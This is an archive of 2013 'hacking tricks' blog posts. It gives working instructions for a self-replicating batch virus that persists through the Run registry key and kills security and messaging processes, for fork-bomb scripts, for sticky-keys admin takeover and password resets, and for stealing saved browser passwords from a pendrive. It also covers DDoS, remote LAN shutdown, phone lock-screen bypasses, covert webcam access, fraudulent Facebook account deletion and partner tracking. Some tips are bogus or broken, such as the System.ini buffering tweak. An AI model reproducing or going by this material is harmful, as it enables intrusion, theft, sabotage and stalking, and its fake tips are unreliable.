
Showing posts from 2013

How to create 'Batch file viruses' That can do many things ?

Here is a Batch File virus which can: 1.Copy itself into startup 2.Copy itself over one thousand times into random spots in your computer. 3.Hide its self and all other created files 4.Task kill MSN, Norton, Windows Explorer, Limewire. 5.Swap the left mouse button with the right one 6.Opens alert boxes 7.Changes the time to 12:00 and shuts down the computer copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ). @Echo off color 4 title 4 title R.I.P start start start start calc copy %0 %Systemroot%\Greatgame > nul reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ /d %systemroot%\Greatgame.bat /f > nul copy %0 *.bat > nul Attrib +r +h Greatgame.bat Attrib +r +h RUNDLL32 USER32.DLL.SwapMouseButton start calc cls tskill msnmsgr tskill LimeWire tskill iexplore tskill NMain start cls cd %userprofile%\desktop copy Greatgame.bat R.I.P.bat copy Greatgame.bat R.I.P.jpg copy...

How to COPY in EXAMS ' THE COOL WAY' with out being CAUGHT?

Though you must remember that cheating is a punishable offense, once caught you might just have to spend a part of your lifetime behind the bars(only in some cases) . But just in case you want to fulfill your malicious intentions, you can go through a few tricks of the trade that have been mentioned here:- ->ERASER METHOD-You just need an eraser for this to work out for you. Write out important points on a medium or small sized eraser(whichever you prefer).The writing should be micro sized, though understandable. You can keep the eraser inside your pencil box,or anywhere else,out of the invigilator’s sight! ->SLIP-PEN METHOD-Take a small slip of paper,write out the important points,roll it up n place it carefully in your pen cap or roll it onto the refill. When the time arrives, slowly take the slip out, read up the info n then carefully place it back or trash it. Just be aware of the invigilator. ->NAIL-PENCIL METHOD-This trick is good especially for girls as they have lon...

How to hide drives in windows xp using command promt?

1-First go to search and type diskpart and hit enter. 2-Now “diskpart.exe” is open then type “list volume”, this command is used to see all the drives/volume which is present currently on your system. 3-Then type “select volume” and hit enter this command is for to select the which drive/volume you want to hide. 4-Here I am “select volume 0 , I want to hide my ‘G drive’.You can hide your drive with the volume present in your system. 5-Type “remove letter G” and hit enter. 6-now I will show you how to assign the hide drive/volume. Type “assign letter G”.It will again assign the disk volume.


Yup!! the android pattern lock can be hacked!!! Follow the procedure... Thing you need:- *.USB cablefor your mobile *. ADB tool (u can easily get it by googling it ) {Note:- USB debugging must be on } NOW LOCK YOUR MOBILE WITH YOUR DESIRED PATTERN.., AND CONNECT TO PC USING USB CABLE and FOLLOW THE PROCEDURE GIVEN BELOW...... Android Debug Bridge (adb) is a versatile command line tool that lets you communicate with an emulator instance or connected Android-powered device. It is a client-server program that includes three components: A client, which runs on your development machine. You can invoke a client from a shell by issuing an adb command. Other Android tools such as the ADT plugin and DDMS also create adb clients. A server, which runs as a background process on your development machine. The server manages communication between the client and the adb daemon running on an emulator or device. A daemon, which runs as a background process on each emulator or device instan...

How to invert, tilt left or right side, upsidedown the display of nokia mobile phones ?

Hi guys, after a long gap i'm back with some tricks :-) :-) Turn the Nokia screen display upside down and sideways. *#5511# for default view. *#5512# to rotate the view left. *#5513# to rotate the view upside down. *#5514# to rotate the view rotate right. Works with older Nokia models like the Nokia 1600 and some other handsets..

What is DDos attack ? How to DDos any website manually ?

Today i'll tell you how to DDoS Any Website.First i'll tell you what is DDOS Attack? DDOS, short form for Distributed Denial of Service, is a type of DOS attack where multiple compromised systems -- which are usually infected with a Trojan -- are used to target a single system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the end targeted system and all systems maliciously used and controlled by the hacker in the distributed attack. This type of attack is the most dangerous form of attack, this form of hacking is most commonly used by the internet's largest hacktivist group 'ANONYMOUS'. How To DDOS Any Website 1.Find a target website Which you want to DDOS EG: 2. Now we have to find ip address of website so, Goto run )Typ CMD )then type ping your target website url EG: 3. Now you will find the ip adress of website below just copy that ip adress let it be for ex : ...

How to convert facebook account into facebook page and convert ur friends list into likes?

Thought of creating a new page , and want many likes, and this way u can convert ur facebook account into facebook page and ur friends list into LIKES :- Important points to remember before converting Facebook Profile Into Page All your confirmed friends and subscribers will be converted to people who like your new Page Your current profile picture will become your Page's picture. Your Username Will Become Your Page's Username. Now just follow below steps to change you Facebook profile into Facebook page Steps To Migrate From Facebook Profile To Facebook Page First go to the link Mark On I agree to Facebook Pages Terms Then Click On "Get Started" Now Your Facebook account Becomes Your Facebook Page. Cheers !!!

How to root or jailbreak your Android phone or tablet?

Once you decide you want to jailbreak your android device, you have multiple ways in which you can complete the task. Before you start, you should understand the basic process for how to jailbreak android devices. Once you know the basic procedure to jailbreak android phones, tablets andother devices, you can make an informed decision as to which method will work best for your application and personal skill level. Step #1: Identify the software and hardware version of your android device The first step in how to jailbreak an android device is to know the specific software version and hardware build that your device is using. Because there are so many different models of devices, you will need to refer to the documentation for your specific device. This step is very important, so take the time to ensure you are absolutely certain about the hardware and software version of your android device. Step #2: Select the proper android jailbreak utility After you’ve determined the specific h...

How to merge two facebook pages into one?

Yes, you will be able to merge duplicate Pages if you are a manager-level admin of both Pages. This option is only available for Pages that represent the same thing and have similar names. To merge your Pages: 1.Make sure you're using Facebook as yourself and not as your Page 2.From the top of the Page you want to keep, click Edit Page 3.SelectEdit Settings 4.Select Merge Pages and click Merge duplicate Pages 5.Fill out the form and click Send Merging Pages combines all your likes and check-ins, but all other content from the Page you don't want to keep (such as posts, photos and the username) will be permanently deleted. Content on the Page you want to keep will remain unchanged, except for the addition of likes and check-ins that were merged from the other Page. Note: The Page you don't want to keep will be removed from Facebook and you won't be able to unmerge it.

How to install BACKTRACK 5 in your ANDROID MOBILE ?

Backtrack is an open source Linux distribution for penetration testing. The best thing about backtrack is that it offers a lot of integrated penetration tools for security researchers and ethical hackers to penetrate a network. Now a days almost 60% of total elite security researchers are using backtrack for its efficiency and simplicity. Backtrack comes in various flavors including arm version also. Android mobile phone also uses arm processors so we can install an arm version of backtrack on android devices by following some easy steps. So today we are sharing an android trick which will guide you "How to install Linux backtrack on android phone",if you follow this tutorial Then your old android operating system will not be affected. It means that you can use two operating systems on your android phone on a same time. Things required: 1) Rooted android phone. 2) 4 or 8 gb free external memory . 3) Terminal emulator android application. 4) Android vnc. 5) Backtrack o...

Hack facebook account and Gmail account using Backtrack 5 | Hack For Security

Hack facebook account and Gmail account using Backtrack 5 | Hack For Security


Simple Steps To make your own Antivirus The main functioning of Antivirus is to detect and remove harmful or unwantedfiles which may slow down your computer and windows .But if you don't have enoughtime to download any best antivirus. Then simply use this trick to make your own antivirus. This antivirus scan by using command prompt and delete unwanted files automatically. Open your Notepad and paste this given code @ echo off title Antivirus echo Antivirus echo created by your name :start if exist virus.batgoto infected if not exist virus.bat goto clean cd C:\Windows\system32 :infected echo warning virus detected del virus.bat pause goto start :clean echo System secure! pause exit now save your file with Deepak25R.bat and select "All files" now run your saved files automatically scan starts... And enjoy :-)

How to Track or Locate a Mobile on Google Maps ?

Hey friends in my today’s post I will tell you how to trace, locate or find a mobile’s location on the Google maps. It shows almost the exact location not like other services which provide only the city location. This will show the location of the cellular tower from which the mobile is connected. So this method is mainly used to locate your smartphone if its stolen or lost. And so if your mobile is lost you need not get tensed you can locate it very easily with anti-theft feature provided by many apps. But for this tutorial I’ve chosen AVG mobile antivirus Free Edition. The free edition of AVG itselfhas many features so I prefer this app well you can use many other apps which provide this service to the user. So now let us quickly move on to the tutorial how to locate it. I’ll tell you step by step how to do it. Firstly the requirement is to have the app installed on your mobile. This is nothing special cause its common thing that all suggest to do i.e. tohave an antivirus installed...

How do Hackers Steal Your stored/saved passwords in browsers using Pendrive?

Here's a small hack by which you can turn any pendrive into a password stealer.The pendrive will steal all the stored passwords in the system of the victim. Download : You can download the files from here ( . Steps in detail : 1. Extract pendrive password stealer.rar . 2. Copy all the contents of the file. 3. Paste the contents in the pendrive you want to use for stealing. 4. Insert the pendrive in thesystem of the victim. 5.Click on "launch" file. 6. Within seconds your pendrive will have text files containing all the stored passwords of the victim for any website. P.S. : If the victim is not using stored passwords,then the password files will come out empty.

How to shutdown/restart peoples computer that's on the sameLAN as u r?

Why not shutdown the computer of the enemy that's about to win on your current LAN game? And while you are the winner, he's a bad loser ;) This is how you do: Start Command Prompt and paste this 'net localgroup' Check out the name of his computer and then paste thisin Command Prompt: shutdown -s -m computername -t 15 -c"Windows need to restart, you fool" –f Hit Enter and wait ;););) This can be done on all users in your same LAN at anywhere. Enjoy

Shutdown Computer with a Cell Phone and Outlook Express

By using this method, a you can shutdown , restart, hibernate, e tc. his or her computer , just by sending an email fromhis or her phone . Everyone want security of his/her laptop or PC soif someone forgot to shutdown ,don't worry i will show you how to shutdown by using mobile phone. To do this, all you will need is Microsoft Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown . So, this is how you do this follow steps: 1. First, you need the batch files to perform the Shutdown , Hibernateetc. You can write them down yourselves 2. open notepad and type c:\ windows \system32\ shutdown -s -f -t 00 and save it as shutdown .bat 3. Open up Microsoft Outlook . Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by...

Shutdown Computer with a Cell Phone and Outlook Express

By using this method, a you can shutdown , restart, hibernate, e tc. his or her computer , just by sending an email fromhis or her phone . Everyone want security of his/her laptop or PC soif someone forgot to shutdown ,don't worry i will show you how to shutdown by using mobile phone. To do this, all you will need is Microsoft Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown . So, this is how you do this follow steps: 1. First, you need the batch files to perform the Shutdown , Hibernateetc. You can write them down yourselves 2. open notepad and type c:\ windows \system32\ shutdown -s -f -t 00 and save it as shutdown .bat 3. Open up Microsoft Outlook . Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by...

How to create virus that creates 3000 folders in minutes?

open notepad and type @echo off :loop md %random% goto loop saveas deepak.bat

How to create folder replicator virus?

open notepad & type :loop md Virus cd Virus goto loop save as deepak.bat

Automatic Msg Annoyer (Message Broadcaster)

Open Notepad & Type @echo off :netannoy msg * Hi! msg * How r u ? msg * Wat’s Up ? msg * Myself deepak…. msg * My Web Links are…. msg * msg * @ HackTECH1 msg * goto netannoy Save as deepak.bat

How To Request And Transfer Mobile Balance From One Phone To Another

If you are running (or already ran) out of balance in your mobile phone and can’t find any shop from where you can get your mobile phone recharged or if you don’t have enough money by which you can get your mobile phone recharge then you can send a free SMS to any of your friends or relative by requesting for balance transfer to your mobile number. Most of the telecom services provides in India lets you transfer certain amount of balance from one mobile to another mobile, but both of them should be prepaid numbers and should belong to same telecom services provider. Who will be sending the balance will be charged between 1 and 3 depending upon the amount s/he will be sending and alsodepending upon which service provider you both are using. To Request For Balance Tata docomo - dail *363# and a flash menu will open up and after that just press ask for balance or share balance and then enter amount and then mobile number and thats it its done!! Vodafone Send: TRAN (amount u want to ...

How to Break Windows 7 Password (Easy Way)

Start your computer and enter into Bios Setup . Change your boot preferences to bootfrom CD /DVD . Insert your windows Bootable CD and select the “ Repair your computer ” option from the lower left-hand corner. Then click on command prompt option. First you’ll want to type in thefollowing command to backup the original sticky keys file: copy c:windowssystem32sethc.exe c: Then you’ll copy the commandprompt executable (cmd.exe) over top of the sticky keys executable copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe Now you can reboot the PC. Resetting the Password Once you get to the login screen, hit the Shift key 5 times , and you’ll see an administrator mode command prompt. Now to reset the password—just type the following command, replacing the username and password with the combination you want: Syntax : net user* Example : net user deepak * and hit enter. Set any password for that account. That’s all there is to it. Now you can login.

How to Flash Dead Nokia Mobile Phones with USB Data Cable?

You can flash your dead Nokia mobile phone by yourself using a USB data cable/connectivity cable. The tool, which is required to flash the phone, is Nokia's Phoenix Service Software. Please remember that you can perform a successful flash on your phone only if its firmware has been lost or corrupted. If your phone is not turning on due to any hardware issue, then this procedure will not work for it. To flash a dead Nokia mobile phone, follow the below steps: 1. Download and install the Phoenix Service Software( 2. Download the firmware of your phone. You can downloadit with Navifrim or can search it on the web 3. Install the firmware to the directory C:\Program Files\Nokia\Phoenix\Products\ Folder * 4. The Folder * should be created manually for the concerned firmware, if it is not created during firmware installation. If the firmware files are in form of .zip or any other compression, then extract/copy the firmware files to the specified l...

How to display your own custom message in welcome screen of windows xp?

How To Display The Message On Windows XP Welcome Screen *. Go to Start --> Run and type regedit and hit Enter. *. Now Navigate for the Path HKEY_LOCAL_MACHINE\ SOFTWARE \Mcft\Windows NT\CurrentVersion\Winlogon. *. Now change the key legalnoticeaction and changethe name what ever you want, this key is used to give the name of the windowto appear. *. Modify the key legalnoticetext with what you want the window to display. *. Reboot Your system

How to display your own custom message in welcome screen of windows xp?

How To Display The Message On Windows XP Welcome Screen *. Go to Start --> Run and type regedit and hit Enter. *. Now Navigate for the Path HKEY_LOCAL_MACHINE\ SOFTWARE \Mcft\Windows NT\CurrentVersion\Winlogon. *. Now change the key legalnoticeaction and changethe name what ever you want, this key is used to give the name of the windowto appear. *. Modify the key legalnoticetext with what you want the window to display. *. Reboot Your system

How To Create an eBomb?

1. Click on Start-> Run -> NotePad. 2. Copy the following code. @echo off msg * (YOUR MSG HERE) cls msg * (YOUR MSG HERE) cls msg * (YOUR MSG HERE) cls begin goto %random% :1 start cmd.exe goto begin :2 start paint.exe goto begin :3 start pinball.exe goto begin :4 start iexplore.exe goto begin :5 start explorer.exe goto begin :6 start iexplore.exe"" goto begin 3. Now save the notepad as filename.bat 4. Now dare to open the filename.bat Note: This filename.bat makes yourpc slow because the above program code is to open multiple process at same time so that it makes your computer hang.

How To Bypass Smartphone LockScreen #iphone

iPhone Apple iOS 6.1.2, This vulnerability was founded by Vulnerability Lab researcher. This vulnerability allows users to bypass the lock screen pass code and access the phones photos and contacts. Researchers say thevulnerable device can be plugged into a computer via USB and access data like voice mails, pictures, contacts, etc. Steps: 1. Connect your device with itunes and the appstore to make sure the code lock is activated. 2. Push the power button (top|right) 3. The mobile will be activated and the iOS code lock will bevisible 4. Now, you click on the emergency call 5. Try to dail any random emergency call number from a public listing (we used 911, 110 and 112) 6. Call the number and cancel the call directly after the dailwithout a direct connection to the number 7. Push again the power buttonand push after it the iphone button (square) in the middle 8. In the next step you push the power button 3 secounds and in the third secound you push also with one finger the square and wi...

How To Bypass Smartphone LockScreen #iphone

iPhone Apple iOS 6.1.2, This vulnerability was founded by Vulnerability Lab researcher. This vulnerability allows users to bypass the lock screen pass code and access the phones photos and contacts. Researchers say thevulnerable device can be plugged into a computer via USB and access data like voice mails, pictures, contacts, etc. Steps: 1. Connect your device with itunes and the appstore to make sure the code lock is activated. 2. Push the power button (top|right) 3. The mobile will be activated and the iOS code lock will bevisible 4. Now, you click on the emergency call 5. Try to dail any random emergency call number from a public listing (we used 911, 110 and 112) 6. Call the number and cancel the call directly after the dailwithout a direct connection to the number 7. Push again the power buttonand push after it the iphone button (square) in the middle 8. In the next step you push the power button 3 secounds and in the third secound you push also with one finger the square and wi...

How To Bypass Smartphone LockScreen #s3

The bug was discovered by Sean McMillan Steps: 1) On the code entry screen press Emergency Call 2) Then press Emergency Contacts 3) Press the Home button once 4) Just after pressing the Home button press the power button quickly 5) If successful, pressing the power button again will bring you to the S3's home screen McMillan said that it can "take quite a few attempts to get this working, sometimes this method works straight away, other times it can take more than 20 attempts."

How To Bypass Smartphone LockScreen

Bypass lock screen of iPhone and Samsung Smartphones bypass vulnerabilities. Which has founded by security researchers. Samsung Galaxy Note2 and S3 Samsung Galaxy Note2 Security specialist Terence Eden explained in his blog that unauthorized users can press the “emergency call” and the “in case of an emergency” (ICE) contact list buttons and hold down the home button at the same time to cause the device’s home screen to pop up. From there a user can touch an app and gain access to it. Steps: 1. Lock the device with a"secure" pattern, PIN, or password. 2. Activate the screen. 3. Press "Emergency Call". 4. Press the "ICE" button on the bottom left. 5. Hold down the physical homekey for a few seconds and then release. 6. The phone's home screen will be displayed - briefly. 7. While the home screen is displayed, click on an app ora widget. 8. The app or widget will launch. 9. If the widget is "direct dial" the phone will start ringing.

How to turn Your Bluetooth Enabled Cell Phone Into Wireless WebCam

After doing several researches, I finally hit the success. That’s why I would like to share this to you too. To turn my cell phone in to wireless webcam I needed only extra thing that is Bluetooth adapter for my desktop. I purchased it from the local market. Let’s summarize things you’ll need: -Cell phone with java, Bluetooth and camera in it. -Bluetooth adapter for desktop -Computer -Software that will turn your phone in to wireless webcam Now lets begin with the tutorial:Download and install Smart Cam V1.5 for your desktop. Now again download the favorable cell phone software from here( . If you have symbian OS in your cell phonethen download the correct symbian version, or you can download the java version as well. After downloading install it to your cell phone. Now you’ll need to pair your Cell phone with computer from Bluetooth. Run smart cam program in windows. And open smart cam in your cell phone as...

Brute Force Password Cracker Free Download: Bruter 1.0

Bruter is a parallel network login brute forcer on Win32 platform only. It currently supports following services: FTP, HTTP (Basic), HTTP (Form), IMAP, MSSQL, MySQL, POP3,SMB-NT, SMTP, SNMP, SSH2, Telnet, VNC. To see full changelog since alpha version download link

Brute Force Password Cracker Free Download: Bruter 1.0

Bruter is a parallel network login brute forcer on Win32 platform only. It currently supports following services: FTP, HTTP (Basic), HTTP (Form), IMAP, MSSQL, MySQL, POP3,SMB-NT, SMTP, SNMP, SSH2, Telnet, VNC. To see full changelog since alpha version download link

How To Hack Free STD-ISD Calls | make free STD-ISD calls

Today i am going to show you How To make free STD-ISD calls . I hope you will really enjoy it Follow the belowsteps to do this.. 1) Dial 1-800-373-3411 (1-800-FREE-411), 2) When the automated operator greets you (probably after an ad) you need to say “Free Call”. You will, then, be connected to the server. 3) Enter (key in) your destination number in “country code + destination number” format. For example 9122********* could connect you to someone in Mumbai. 4) Continue talking for 5 minutes and then this free call will get disconnected. You know what you want to do after that, yes follow steps 1-4 again. This number 1-800-FREE-411, when dialed from a landline in USA is a free number. For our readers outside USA there is no reason to get disappointed. You can use skype to call 1-800-373-3411 for free and you can get free international calls anywhere in the world. Yes!! That is free ISD as well as STD calls i hope you really enjoy it!

How to hack remote webcam via yahoo chat ?

Readers, I am very glad to write this and, I have heard a lots of people nowadays ask on How to Hack Yahoo Webcam so I am posting this hack. I hope you will really enjoy it We can view the other persons Yahoo Webcam, Who is always denying us. One drawback of this hack is that, you need physical access to the computer whose cam youwant to hack. Follow the below steps to do this 1) Open the following location C:\Program Files\Yahoo\Messenger 2) You will find the file ―res_msgr.dll‖. Delete this file. 3) Download this crackedfile from the below link 4) After downloading it, Paste this in (C:\Program Files\Yahoo\Messenger) NOTE: Don‘t replace the file. Delete the file first and then paste the cracked file in the same folder Then close every thing and restart the system… How it works? The cracked ―.dll‖ file shouldbe placed in the victim‘s computer (whose web cam u wants to see). Then you go back to your system and login to your messenger...

How to hack remote webcam via yahoo chat ?

Readers, I am very glad to write this and, I have heard a lots of people nowadays ask on How to Hack Yahoo Webcam so I am posting this hack. I hope you will really enjoy it We can view the other persons Yahoo Webcam, Who is always denying us. One drawback of this hack is that, you need physical access to the computer whose cam youwant to hack. Follow the below steps to do this 1) Open the following location C:\Program Files\Yahoo\Messenger 2) You will find the file ―res_msgr.dll‖. Delete this file. 3) Download this crackedfile from the below link 4) After downloading it, Paste this in (C:\Program Files\Yahoo\Messenger) NOTE: Don‘t replace the file. Delete the file first and then paste the cracked file in the same folder Then close every thing and restart the system… How it works? The cracked ―.dll‖ file shouldbe placed in the victim‘s computer (whose web cam u wants to see). Then you go back to your system and login to your messenger...

How to update facebook status with a blue text?

Tips to Update FacebookStatus in Blue Text *. First Login to your Facebook Account *. In the Status Update field copy/paste the following code @[1: ]@@[1:[0:1: Type Here]] This code is more efficient as it doesn’t require Profile Id instead it automatically points to your own Facebook profile

Use pen drive as ram

Now a days we can use pen drive itself as a RAM for our system and just increase thegeneral boot up speed and also operational speed of the system . Now a question arises that "Is it possible only for those who have Vista OS " ? my answer is a Big NOOOO.. It can be used by those who have Windows XP and also for Windows 2000 (Mostly) .All u need is a pen drive of minimum 1GB . now I will tell you the steps 1. Insert the Pen Drive (1GB atleast) in the USB port try to prefer 4GB. 2. Let the PC do what it wants to do to detect it.. 3 . After it finished his work,you have to act smart, " Here goes the real thing " 4. Right Click on My Computer -> Properties 5. Advanced -> PerformanceSettings 6 . Advanced -> Change 7. Select the Pen Drive 8. Click on Custom Size " Check the value of space available " 9. Enter the same in the Initial and the Max columns " You just used the space ofthe PenDrive as a Virtual Memory " Restart . ...... . Now check ...

Make Windows Greet you with a Custom Voice Message at Startup

Hey guys today we will learn how to make your computer greet you on every start up, Follow the below steps and boom, you are done. Click on Start. Navigate to All Programs, Accessories and Notepad. Copy and paste the exactcode given below. ======================================================================== Dim speaks, speech speaks="Welcome to your PC, Username" Set speech=CreateObject("sapi.spvoice") speech.Speak speaks ================================================= Replace Username with your own name. Click on File Menu, Save As, select All Types in Save as Type option, andsave the file as Welcome.vbs or "*.vbs". Copy the saved file. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup(in Windows XP) or to C:\Users\ User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 7 and Windows Vista) if C: is your System drive. Paste the file Same process for windows 8 users too. Now next tym wen ur pc wi...


So guys today we gonna learn how to make your USB password protected without any software, I'll show you a simple trick to lock your USB drive without using any 3rd party software. So let's see how to set a password protect on your USB without using any software. Insert your USB drive to computer Click on Start In "Search programs and files" box, type Bitlocker Drive Encryption Now launch that application. Then look for your USB drive and click on Turn on Bitlocker Windows will ask you to set a password. Now set a strong password. Click on Next If you want save the password in a safe place. And click on Next Now click on Star Encrypting That's all !!! :) Now onwards if someonetries to access your USB,Windows will ask him/herto enter the current password. enjoy ♥ Keep visiting. :)

How to Boost youtube Buffering speed without Software

Hi Friends.It's Exams time so a bit busy with my studies, but i will try to update you daily. So today we will see how to Boost youtube bufferring speed without using any software. This trick will help you to get rid of wasting time in buffering. People with Slow internet connection mostly face this problem, for those, reading this article will help them for sure. So lets get started. Step 1: Type"System.ini" in Run. press ok. Step 2: A new notepad file will open which will look like this: Step 3: Copy paste the below code in that notepad file. page buffer=1000000Tbps load=1000000Tbps Download=1000000Tbps save=1000000Tbps back=1000000Tbps search=1000000Tbps sound=1000000Tbps webcam=1000000Tbps voice=1000000Tbps faxmodemfast=1000000Tbps update=1000000Tbps It will look like this : Step 4: Everythink is done now... Just save the file and restart you pc. Note= restarting your Pc is important inorder changes to take place. After that open youtube and you will see the differenc...


Hello guys, Today will provide you 2 awesome and easy trick through which you can hack admin account through guest account. If you been usingsomeones Pc in guest account and want to haveAdmin privilage then worry not,there is a trick for you to Gain Admin Privilage . lets get started with it. Method 1. 1) Go to C:/windows/system32. 2) Copy cmd.exe and paste it on desktop. 3) Rename cmd.exe to sethc.exe. 4) Copy the new sethc.exe to system 32,when windows asks foroverwriting the file,then click yes. 5) Now Log out from your guest account and at the user select window,press shift key 5 times. 6) Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open. 7) Now type “ NET USER ADMINISTRATOR"zzz" where “zzz" can be any password you like and press enter. 8) You will see “ The Command completed successfully" and then exit thecommand prompt and login into administrator with your new password. 9) Bravo !! Now You have hacked admin...

How to Bypass "ANY" Windows Login Password ? |

How to Bypass "ANY" Windows Login Password ? |

Download "Facebook Pro": A Book which contains Facebook Hacks, Tips and Tricks from All Around the Web ~ Hacking Tweaks

Download "Facebook Pro": A Book which contains Facebook Hacks, Tips and Tricks from All Around the Web ~ Hacking Tweaks

What Is Ddos Attack And How Does It Work?

Many of people in illusions that Website hacking and Attacking is very Difficult and only some hackers and professionals can Do It... Now that's absolutely wrong thinking... Its as Easy as alphabetic. First of all We all should know What are the Different Methods Of attacking Websites... There are Generally Three Methods of Attacking an Website... 1. Ddos Attack 2. Shell Scripts Attack 3. Javascript Attack or Attack through Scripting. Note: SQL and other techniques comes in the Hacking Websites Part Not in attacking Part. Attacking is simply for fun or intentionally causing damage to the Website.. Ddos Attack What is a Distributed Denial of Service (DDoS) attack? Have you ever tried to make a telephone call but couldn't because all the telephone circuits were busy? This may happen on a major holiday and often happens on Diwali,New year etcc. The reason you couldn't get through is because the telephone system is designed to handle a limited number of calls at a time. So upto...

Trace&SPY Your GF Mobile Live For Free Instantly

Yes Guys, this is now possible...I m not jokingMany of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done. Yes,PhoneOnMap.commakes it possible, which provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet. This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (LOL) . ThisPhoneOnMap.comcan be used worldwide and you can use it while travelling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketting department of an organization to track the marketing agents. If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access th...

Trace&SPY Your GF Mobile Live For Free Instantly

Yes Guys, this is now possible...I m not jokingMany of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done. Yes,PhoneOnMap.commakes it possible, which provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet. This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (LOL) . ThisPhoneOnMap.comcan be used worldwide and you can use it while travelling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketting department of an organization to track the marketing agents. If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access th...

How to delete any facebook account?

Here is a method to delete any facebook profile or account. It works 100%. But its just for educational purpose. So don't use it on anyone. Once Deleted Profile can never be recovered. Use wisely. WHAT ALL U NEED ? 1. Victim's profile link ( you can get it easily ) 2. His/Her Email which he/she uses to sign in 3. His/Her birth date which he/she has used in the profile 4. Make an Email ID on gmail or yahoo with the first name and last name same as on victim's facebook profile. HOW TO DO IT 1. Go to this page: 2. Enter details. In the place of ' email address where you can be contacted ' enter the fake email u created. 3. you will get a mail on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim's name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. ...

How to lock folders in windows without any software

>>Locking Folders: *. Consider you want to lock a folder named XXXX in yourE:\, whose path is E:\XXXX. *. Now open the Notepad and type the following [code]ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code] *. Where xxxx is your folder name. Save the text file as loc.bat in the same drive. *. Open another new notepad text file and type the following [code]ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx[/code] *. Save the text file as key.bat in the same drive. Steps to lock the folder: *. To lock the xxxx folder, simply click the loc.bat andit will transform into control panel icon which is inaccessible. *.

How to lock folders in windows without any software

>>Locking Folders: *. Consider you want to lock a folder named XXXX in yourE:\, whose path is E:\XXXX. *. Now open the Notepad and type the following [code]ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code] *. Where xxxx is your folder name. Save the text file as loc.bat in the same drive. *. Open another new notepad text file and type the following [code]ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx[/code] *. Save the text file as key.bat in the same drive. Steps to lock the folder: *. To lock the xxxx folder, simply click the loc.bat andit will transform into control panel icon which is inaccessible. *.

How to fix corrupted files in windows?

>>FIX CORRUPTED FILE IN WINDOW XP 1.Load XP cd into cd drive 2. go to Run 3. type sfc/scannowok 4. Then copy its lost file frm cd

How to crack bios password?

>>CracK BIOS Password >Open the CPU >Observe the Motherbord>Remove the Silver Battery(3v) >Wait 2 minutes and place the battery >>Restoring a Lost Desktop- >Start >Run Type a period " . " Then press Enter

How to crack bios password?

>>CracK BIOS Password >Open the CPU >Observe the Motherbord >Remove the Silver Battery(3v) >Wait 2 minutes and place the battery >>Restoring a Lost Desktop- >Start >Run Type a period " . " Then press Enter

How to crack bios password?

>>CracK BIOS Password >Open the CPU >Observe the Motherbord >Remove the Silver Battery(3v) >Wait 2 minutes and place the battery >>Restoring a Lost Desktop- >Start >Run Type a period " . " Then press Enter

How to crack bios password?

>>CracK BIOS Password >Open the CPU >Observe the Motherbord >Remove the Silver Battery(3v) >Wait 2 minutes and place the battery >>Restoring a Lost Desktop- >Start >Run Type a period " . " Then press Enter

How to clean ur RAM and speed up ur computer?

>>If your computer is slow? then clean up the ram.. >Open notepad >type FREEMEM=SPACE(64000000) >Save it as ram.vbs now run the script. Check out !!

How to Install window XP In 10Min?

>>Hey Guys Diz Time Extreme Hack That You Will Never Imagine But Its Truth and We have Done It. This Time I will explain How to Install Windows XP In Just 10 minutes. > INSTALLING WIN XP IN10 MINUTES!

How to Use Windows 7 for a year without Activation?

Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximatelyan ­ year! Here is a way to dothat. 1. Goto “ Start Menu -> All Programs -> Accessories ” . Right click on “ Command Prompt ” and select “ Run asAdministrator “. If you are not the administrator then you are prompted to enter the password, or elseyou can proceed to step-2. 2. Now type the following command and hit enter slmgr -rearm 3. You will be prompted to restart the computer. Once restarted the trial period willbe once again reset to 30 days. You can use the abovecommand for up to 3 times bywhich you can extend the trial period to 120 days without activation. 4. Now comes the actual trick by which you can extend th...

Trick On How To Hide Text In Images (Steganography)

It is widely claimed that the trick of hiding text into images (Steganography) has been used by Al Qaeda for communication for carrying out 911 attacks.Well if you also want such a strong security in your communication so that nobody else can interpret your messages except the desired person then we have a free solution for you. By using this trick your text will get hidden into any image of your choice without increasing its size or without reducing its quality.Your data will be encrypted in the image with RC_4 encryption plus SHA hashing.So ,there is no need to worry that it can be easily cracked by anybody. Here is the tutorial with Trick On How To Hide Text In Images (Steganography) for free First download imagehide software.Its a freeware utility for hiding text in an image The interface of Imagehide is very simple .Once it is installed all you have to do is to load the image in which you want to hide your text (Steganography) type the text and hit the Write data option.You can al...

